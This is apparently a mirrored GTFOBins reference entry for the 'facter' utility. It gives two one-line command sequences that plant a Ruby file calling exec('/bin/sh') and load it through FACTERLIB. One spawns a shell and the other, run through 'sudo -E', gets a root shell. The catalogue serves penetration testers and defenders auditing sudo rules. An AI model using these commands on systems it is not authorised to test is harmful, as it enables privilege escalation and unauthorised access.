1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/facter.md
2018-10-05 18:55:38 +01:00

262 B

functions
shell sudo
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF facter
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF sudo -E facter